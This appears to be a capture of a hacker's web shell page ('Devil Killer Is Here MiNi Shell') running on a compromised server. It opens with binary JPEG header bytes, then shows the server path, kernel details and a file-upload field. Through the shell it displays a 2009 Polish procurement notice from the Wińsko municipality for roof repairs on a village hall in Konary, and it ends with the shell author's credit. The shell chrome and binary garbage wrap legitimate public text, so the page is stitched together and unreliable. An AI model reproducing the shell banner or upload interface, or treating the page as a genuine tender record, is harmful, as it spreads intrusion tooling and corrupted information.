JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090206/34793-N-2009.html

<p class="kh_header"><b>Wińsko: Remont dachu świetlicy w Konarach</b><br>
<b>Numer ogłoszenia: 34793 - 2009; data zamieszczenia: 06.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Wińsko , pl. Wolności 2, 56-160 Wińsko, woj. dolnośląskie, tel. 0-71 3898100 w. 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.winsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dachu świetlicy w Konarach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy  wymiany pokrycia dachowego z dachówki karpiówki na budynku świetlicy wiejskiej w Konarach dz. Nr 178/6 wraz z przemurowaniem ścian i kominów, wymianą częściową elementów więźby dachowej, rynien i rur spustowych. Budynek na którym będą prowadzone roboty budowlane jest budynkiem częściowo zamieszkałym w związku z czym należy wziąć pod uwagę iż prace będą wykonywane na czynnym obiekcie co wiąże się z odpowiednim zabezpieczeniem placu budowy. Wykonawca zobowiązany jest do uzyskania zgody od zarządcy drogi oraz dokonania opłaty za zajęcia pasa drogi podczas wykonywania remontu dachu. 
Wykonawca zobowiązany jest do zapoznania się ze stanem faktycznym przedmiotu zamówienia.






Zakres prac obejmuje: - wymianę deskowania dachu i desek czołowych - wykonanie tynków wewnętrznych i zewnętrznych malowanie elewacji i tynków wewnętrznych - wymiana łat drewnianych w połaci dachowej - częściowa wymiana elementów konstrukcyjnych dachu - wykonanie izolacji paroprzepuszczalnej - wykonanie nowego pokrycia z dachówki karpiówki - przemurowanie kominów - przemurowanie rolek ścian szczytowych - wykonanie betonowych czap kominów - tynkowanie kominów powyżej dachu - wymiana rynien - wymiana rur spustowych - wymiana obróbek blacharskich - wykonanie rusztowań przy kominach  - wykonanie daszków zabezpieczających - impregnacja grzybobójcza elementów drewnianych więźby dachowej 
Szczegółowy zakres robót określa przedmiar robót stanowiący załącznik nr 7 do SIWZ oraz Specyfikacja techniczna załącznik nr 6  i rysunki załącznik nr 8 do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.32.00.00-6, 45.41.00.00-4, 45.42.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:  1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
   - prowadzą działalność gospodarczą tożsamą z przedmiotem zamówienia i posiadają aktualne   
     dokumenty, potwierdzające wymagane uprawnienia
  - nie zalegają ze składkami ZUS lub KRUS bądź uzyskali przewidziane prawem zwolnienie,  
     odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniu w całości wykonania decyzji  
    właściwego organu
  - nie zalegają z opłaceniem podatków i opłat bądź uzyskali przewidziane prawem zwolnienie,  
    odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniu w całości wykonania decyzji   
    właściwego organu
  1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.    - wykonawcy zobowiązani są przedstawić że w okresie ostatnich pięciu lat przed dniem wszczęcia 
     postępowania o udzielenie zamówienia ,a jeżeli okres prowadzenia działalności jest krótszy- w tym  
    okresie, wykonali należycie, co najmniej 3 roboty budowlane odpowiadające swoim rodzajem 
    robotom budowlanym stanowiącym przedmiot zamówienia tj. roboty remontowe dachów, o 
    wartości każdej z robót, równej co najmniej 80 000 PLN(brutto), przedstawić referencje.
  - wykażą, że dysponują min 1 osobą posiadającą uprawnienia do kierowania robotami w specjalności  
     konstrukcyjno-budowlanej zgodnie z wymogami ustawy Prawo Budowlane, która jest wpisana na  
    listę właściwej Izby Samorządu Zawodowego oraz posiada aktualne uprawnienia.

1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
 - posiadają polisę, a w przypadku jej braku inny dokument który potwierdzi, że wykonawca jest   
    ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w  
   okresie realizacji zadania.

1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.  2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:  2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa 
      zamówień publicznych opisanych w ppkt. 1.1 do 1.4. 2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych. 2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, 
      lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych 
      czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji. 2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.  2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów 
     potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z 
     zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.  3. Zamawiający odrzuca ofertę jeżeli:  3.1 jest niezgodną z ustawą 3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych. 3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu  
      nieuczciwej konkurencji  3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,   3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie 
      zamówienia. 3.6 zawiera błędy w obliczeniu ceny  3.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie 
      omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych  3.8 jest nieważna na podstawie odrębnych przepisów,   4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą  5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:  A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę, załącznik  nr 1 do   
       SIWZ  A.2) Wzór umowy - parafowany przez wykonawcę, załącznik  nr 2 do SIWZ 
A.3) Kosztorys ofertowy szczegółowy sporządzony na podstawie przedmiaru robót,   
        załącznik  nr 7 do SIWZ 
A.4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa  
        zamówień publicznych, załącznik  nr 3 do SIWZ   

 B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:   B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
        działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 
        ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem 
       terminu składania ofert.   B.2) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału  
       Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
       potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz  
       składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane 
       prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w 
       całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed  
      upływem terminu składania ofert.    C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:   C.1) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed wszczęciem 
        niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest 
        krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym 
       stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania 
       wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie, załącznik  nr 4 
      do SIWZ  C.2) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w 
      wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, 
      doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu 
      wykonywanych przez nie czynności, załącznik  nr 5 do SIWZ
C.3) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
       zamówienia, jeżeli w wykazie o którym mowa w pkt.C.2 wykonawca wskazał osoby, którymi 
      będzie dysponował.    D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:  
D.1) polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest  
       ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.winsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wińsko
pl. Wolności 2
56-160 Wińsko
pokój nr 18.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2009 godzina 12:00, miejsce: Urząd Gminy Wińsko
pl. Wolności 2
56-160 Wińsko
pokój nr 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com